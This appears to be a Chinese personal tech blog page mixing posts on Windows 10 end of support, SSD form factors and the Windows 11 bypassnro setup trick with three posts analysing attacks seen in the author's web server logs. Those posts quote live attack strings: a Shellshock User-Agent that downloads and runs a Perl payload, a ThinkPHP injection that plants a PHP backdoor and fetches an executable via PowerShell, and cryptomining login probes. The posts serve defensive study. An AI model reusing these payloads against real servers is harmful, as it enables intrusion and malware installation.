2025年9月15日 星期一

Windows 10將停止技術支援

一早電腦開機桌面變成了 Windows 11?!(忘了截圖) 還以為微軟給我偷偷升級了, 仔細一看原來是要我系統升級, 雖然這個系統升級通知一直都有, 但這次的通知還告知微軟將於 2025年 10月 14日停止 Windows 10技術支援, 版本包含 Windows 10 22H2 Home、Pro、Enterprise、Education及 IoT Enterprise版本,以及 Windows 10 2015 LTSB及 Windows 10 IoT Enterprise LTSB 2015, 這將不再提供最新威脅防護的安全更新... 不過我的 Windows 10還用得好好的, 如果升級為 Windows 11不知這電腦跑不跑的順? 還有一些軟體不曉得還能不能用, 實在很懶得升級

2025年8月30日 星期六

SSD硬碟近期的突破

在 M.2與 U.2之後, EDSFF成為企業級 SSD的新世代標準, 逐步普及於超大規模資料中心與雲端運算, E1(高密度)、E2(大容量)、E3(高效能)各自針對不同應用, 特別是 E2與 E3, 已經突破過去 M.2與 U.2的限制, 不僅支援更大容量還能應對 AI/大數據/高效能運算的需求, 未來將是主流

1. 早期 SSD規格
(1) 2.5吋 SATA/SAS SSD
--最早期多用來取代機械硬碟(HDD)
--傳輸介面受限於 SATA III (6Gbps)或 SAS (12Gbps)
--在效能上逐漸不敷高效能伺服器與資料中心需求
(2) PCIe AIC (Add-in Card) SSD w-studio.idv.tw
--採用 PCIe插卡方式
--效能高, 但體積大、散熱差、擴充性不佳

2. U.2與 M.2規格
(1) M.2 SSD
--原設計給筆電與輕薄裝置
--支援 PCIe/NVMe, 取代 mSATA
--優點: 小巧、速度快(PCIe Gen3/Gen4/Gen5)
--缺點: 受限於尺寸無法支援超大容量(8TB左右), 也有散熱瓶頸
(2) U.2 SSD
--採 2.5吋外型, 但改用 U.2(SFF-8639)接口
--提供更好的散熱與大容量支援, 支援熱插拔
--主要應用在伺服器與資料中心

3. EDSFF(Enterprise & Datacenter SSD Form Factor)
Intel與業界(ODCC、SNIA)於 2017年左右開始推動 EDSFF, 希望解決 U.2/M.2的限制, EDSFF是針對資料中心與企業級儲存設計的新一代 SSD外型規格, 涵蓋 E1、E2、E3多系列, 提供更好的 散熱、擴充性與容量彈性
(1) E1系列:
。E1.S
--外型類似 M.2但更厚, 設計給高密度伺服器
--支援更佳的散熱能力, 可用散熱片設計
--容量可達 8TB以上(比 M.2更大)w-studio.idv.tw
。E1.L
--長條型設計(像口香糖, 長達 318mm)
--可支援超高容量(目前可達 30TB~60TB)
--適用於高容量冷資料或超大資料儲存需求
(2) E2系列:
--近期比較新的發展
--尺寸比 E1.S稍大, 但比 E3小
--著重於大容量( >30TB, 甚至可到 60TB~100TB)與更強散熱能力
--被視為介於 E1與 E3之間的規格, 提供更好的平衡
(3) E3系列:
。E3.S / E3.L
--外型類似傳統的 PCIe/GPU 插卡
--支援更大功耗(>70W), 適合高效能運算(HPC、AI/ML、資料庫)
--支援 PCIe Gen5 x4 / x8, 甚至未來 Gen6
--容量可達數十TB, 同時強化散熱與模組化

2025年6月16日 星期一

從 Web Log 學習系統漏洞 98

Web Log中來自美國 104.131.118.62 的攻擊, 奇怪的是它的網站已經掛掉了:

104.131.118.62 - - [15/Jun/2025:17:18:00 +0800] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nZAZAZA\"';system(\"wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\")"

這是一個夾帶在 User-Agent的 Shellshock漏洞攻擊(CVE-2014-6271), 估狗之後發現 10多年前就已經有了, 利用 Shellshock漏洞執行從 http://pjsn.hi2.ro下載不明檔案 gif.gif(這應該是偽裝成圖檔的惡意程式)惡意 Perl指令碼

而這個 http://pjsn.hi2.ro網址是連到俄羅斯, 所以可能是俄羅斯人對原本的 104.131.118.62網站做跳板

2025年6月7日 星期六

從 Web Log 學習系統漏洞 97

在 Web Log中發現來自美國 20.171.207.237的攻擊:

嘗試注入 php後門程式
20.171.207.237 - - [06/Jun/2025:17:21:17 +0800] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

利用前面的後門下載並執行惡意軟體
20.171.207.237 - - [06/Jun/2025:17:21:19 +0800] "GET /public/hydra.php?xcmd=cmd.exe+%2Fc+powershell+%28new-object+System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe%27%2C%27%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe%27%29%3Bstart+%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

執行 FxCodeShell.jsp測試伺服器點
20.171.207.237 - - [06/Jun/2025:17:23:20 +0800] "GET /FxCodeShell.jsp?address=http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&os=1&view=FxxkMyLie1836710Aa HTTP/1.1" 403 224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:23 +0800] "GET /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:26 +0800] "GET /FxCodeShell.jsp/ HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:29 +0800] "GET /FxCodeShell.jsp%20 HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

最主要還是偽造 OpenAI, GPTbot的 User-Agent
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

2025年4月4日 星期五

微軟Windows 11取消bypassnro指令

微軟在 Widows 11 22H2版本之後, 在系統安裝好進行初始化設定時, 可以用 bypassnro指令來跳過強制網路登入微軟帳號綁定系統的步驟, 設定本機帳號即可, 不過最近傳出微軟將於 24H2版本後取消這個指令w-studio.idv.tw

1. 在初始化時, 若無網路連線則無法進行下一步

2. 此時按下 Shift + F10, 叫出命令提示字元, 輸入 oobe\bypassnro後即自動重開機

2025年3月31日 星期一

從 Web Log 學習系統漏洞 96

從西班牙來的傢伙進行加密貨幣挖礦攻擊(Cryptojacking), 攻擊者試圖利用我的伺服器來挖掘Monero (XMR)、以太坊 (ETH)等加密貨幣

以下這些請求來自挖礦軟體, 它們試圖連接我的伺服器並訂閱到一個挖礦池
195.170.172.128 - - [30/Mar/2025:17:15:57 +0800] "\x16\x03\x01\x02" 400 226 "-" "-"
195.170.172.128 - - [30/Mar/2025:17:15:58 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n" 400 226 "-" "-"
195.170.172.128 - - [30/Mar/2025:17:16:00 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n" 400 226 "-" "-"

以下是以太坊挖礦協議(Ethereum Stratum)的一部分, 攻擊者嘗試登入他們的以太坊挖礦帳戶, 並使用我的伺服器作為算力來源
195.170.172.128 - - [30/Mar/2025:17:16:01 +0800] "{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x044b879a07547d75de1f3bf0b35a9185d8db4c59\",\"x\"],\"jsonrpc\":\"2.0\"}\n" 400 226 "-" "-"

以下是 Monero(XMR)挖礦軟體 XMRig嘗試登入請求, 攻擊者試圖讓伺服器開始為他們挖礦
195.170.172.128 - - [30/Mar/2025:17:16:03 +0800] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4AXkveLwwqn72xdjbC5ANKF4SypYA4nzKKZo4msYkbotMVFANkRQ2Bsa8aJqncbahb5Z1x11V7ZZiRMThZn2DRhrV3iqmpv\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n" 400 226 "-" "-"

只能封鎖 IP 跟關閉 port: 3333、4444